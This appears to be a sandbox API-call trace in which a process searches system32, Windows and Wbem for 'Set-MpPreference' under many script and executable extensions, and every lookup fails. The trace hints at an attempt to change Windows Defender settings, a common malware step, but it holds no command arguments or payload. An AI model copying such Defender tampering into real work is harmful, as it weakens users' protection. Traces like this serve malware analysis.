	[0042.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.720] GetLastError () returned 0x2
	[0042.720] SetErrorMode (uMode=0x1) returned 0x1
	[0042.720] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBS", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.720] GetLastError () returned 0x2
	[0042.720] SetErrorMode (uMode=0x1) returned 0x1
	[0042.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.720] GetLastError () returned 0x2
	[0042.721] SetErrorMode (uMode=0x1) returned 0x1
	[0042.721] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.721] GetLastError () returned 0x2
	[0042.721] SetErrorMode (uMode=0x1) returned 0x1
	[0042.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.721] GetLastError () returned 0x2
	[0042.721] SetErrorMode (uMode=0x1) returned 0x1
	[0042.721] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JS", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.721] GetLastError () returned 0x2
	[0042.721] SetErrorMode (uMode=0x1) returned 0x1
	[0042.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.722] GetLastError () returned 0x2
	[0042.722] SetErrorMode (uMode=0x1) returned 0x1
	[0042.722] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JSE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.722] GetLastError () returned 0x2
	[0042.722] SetErrorMode (uMode=0x1) returned 0x1
	[0042.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.722] GetLastError () returned 0x2
	[0042.722] SetErrorMode (uMode=0x1) returned 0x1
	[0042.722] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSF", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.722] GetLastError () returned 0x2
	[0042.722] SetErrorMode (uMode=0x1) returned 0x1
	[0042.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.722] GetLastError () returned 0x2
	[0042.722] SetErrorMode (uMode=0x1) returned 0x1
	[0042.723] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSH", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.723] GetLastError () returned 0x2
	[0042.723] SetErrorMode (uMode=0x1) returned 0x1
	[0042.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.723] GetLastError () returned 0x2
	[0042.723] SetErrorMode (uMode=0x1) returned 0x1
	[0042.723] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.MSC", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.723] GetLastError () returned 0x2
	[0042.723] SetErrorMode (uMode=0x1) returned 0x1
	[0042.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0042.723] GetLastError () returned 0x2
	[0042.723] SetErrorMode (uMode=0x1) returned 0x1
	[0042.723] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.724] GetLastError () returned 0x2
	[0042.724] SetErrorMode (uMode=0x1) returned 0x1
	[0042.724] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.724] GetLastError () returned 0x2
	[0042.724] SetErrorMode (uMode=0x1) returned 0x1
	[0042.724] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.ps1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.724] GetLastError () returned 0x2
	[0042.724] SetErrorMode (uMode=0x1) returned 0x1
	[0042.724] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.724] GetLastError () returned 0x2
	[0042.724] SetErrorMode (uMode=0x1) returned 0x1
	[0042.724] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psm1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.724] GetLastError () returned 0x2
	[0042.724] SetErrorMode (uMode=0x1) returned 0x1
	[0042.725] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.725] GetLastError () returned 0x2
	[0042.725] SetErrorMode (uMode=0x1) returned 0x1
	[0042.725] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psd1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.725] GetLastError () returned 0x2
	[0042.725] SetErrorMode (uMode=0x1) returned 0x1
	[0042.725] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.725] GetLastError () returned 0x2
	[0042.725] SetErrorMode (uMode=0x1) returned 0x1
	[0042.725] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.COM", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.725] GetLastError () returned 0x2
	[0042.726] SetErrorMode (uMode=0x1) returned 0x1
	[0042.726] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.726] GetLastError () returned 0x2
	[0042.726] SetErrorMode (uMode=0x1) returned 0x1
	[0042.726] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.EXE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.726] GetLastError () returned 0x2
	[0042.726] SetErrorMode (uMode=0x1) returned 0x1
	[0042.726] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.726] GetLastError () returned 0x2
	[0042.726] SetErrorMode (uMode=0x1) returned 0x1
	[0042.726] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.BAT", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.726] GetLastError () returned 0x2
	[0042.726] SetErrorMode (uMode=0x1) returned 0x1
	[0042.726] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.726] GetLastError () returned 0x2
	[0042.727] SetErrorMode (uMode=0x1) returned 0x1
	[0042.727] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.CMD", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.727] GetLastError () returned 0x2
	[0042.727] SetErrorMode (uMode=0x1) returned 0x1
	[0042.727] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.727] GetLastError () returned 0x2
	[0042.727] SetErrorMode (uMode=0x1) returned 0x1
	[0042.727] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBS", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.727] GetLastError () returned 0x2
	[0042.727] SetErrorMode (uMode=0x1) returned 0x1
	[0042.727] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.727] GetLastError () returned 0x2
	[0042.727] SetErrorMode (uMode=0x1) returned 0x1
	[0042.728] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.728] GetLastError () returned 0x2
	[0042.728] SetErrorMode (uMode=0x1) returned 0x1
	[0042.728] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.728] GetLastError () returned 0x2
	[0042.728] SetErrorMode (uMode=0x1) returned 0x1
	[0042.728] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JS", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.728] GetLastError () returned 0x2
	[0042.728] SetErrorMode (uMode=0x1) returned 0x1
	[0042.728] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.728] GetLastError () returned 0x2
	[0042.728] SetErrorMode (uMode=0x1) returned 0x1
	[0042.728] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JSE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.729] GetLastError () returned 0x2
	[0042.729] SetErrorMode (uMode=0x1) returned 0x1
	[0042.729] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.729] GetLastError () returned 0x2
	[0042.729] SetErrorMode (uMode=0x1) returned 0x1
	[0042.729] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSF", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.729] GetLastError () returned 0x2
	[0042.729] SetErrorMode (uMode=0x1) returned 0x1
	[0042.729] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.729] GetLastError () returned 0x2
	[0042.729] SetErrorMode (uMode=0x1) returned 0x1
	[0042.729] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSH", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.730] GetLastError () returned 0x2
	[0042.730] SetErrorMode (uMode=0x1) returned 0x1
	[0042.730] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.730] GetLastError () returned 0x2
	[0042.730] SetErrorMode (uMode=0x1) returned 0x1
	[0042.730] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.MSC", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.730] GetLastError () returned 0x2
	[0042.730] SetErrorMode (uMode=0x1) returned 0x1
	[0042.730] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0042.730] GetLastError () returned 0x2
	[0042.730] SetErrorMode (uMode=0x1) returned 0x1
	[0042.730] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.730] GetLastError () returned 0x2
	[0042.730] SetErrorMode (uMode=0x1) returned 0x1
	[0042.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.730] GetLastError () returned 0x2
	[0042.730] SetErrorMode (uMode=0x1) returned 0x1
	[0042.731] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.ps1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.731] GetLastError () returned 0x2
	[0042.731] SetErrorMode (uMode=0x1) returned 0x1
	[0042.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.731] GetLastError () returned 0x2
	[0042.731] SetErrorMode (uMode=0x1) returned 0x1
	[0042.731] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psm1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.731] GetLastError () returned 0x2
	[0042.731] SetErrorMode (uMode=0x1) returned 0x1
	[0042.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.731] GetLastError () returned 0x2
	[0042.731] SetErrorMode (uMode=0x1) returned 0x1
	[0042.732] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psd1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.732] GetLastError () returned 0x2
	[0042.732] SetErrorMode (uMode=0x1) returned 0x1
	[0042.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.732] GetLastError () returned 0x2
	[0042.732] SetErrorMode (uMode=0x1) returned 0x1
	[0042.732] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.COM", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.732] GetLastError () returned 0x2
	[0042.732] SetErrorMode (uMode=0x1) returned 0x1
	[0042.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.732] GetLastError () returned 0x2
	[0042.732] SetErrorMode (uMode=0x1) returned 0x1
	[0042.732] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.EXE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.733] GetLastError () returned 0x2
	[0042.733] SetErrorMode (uMode=0x1) returned 0x1
	[0042.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.733] GetLastError () returned 0x2
	[0042.733] SetErrorMode (uMode=0x1) returned 0x1
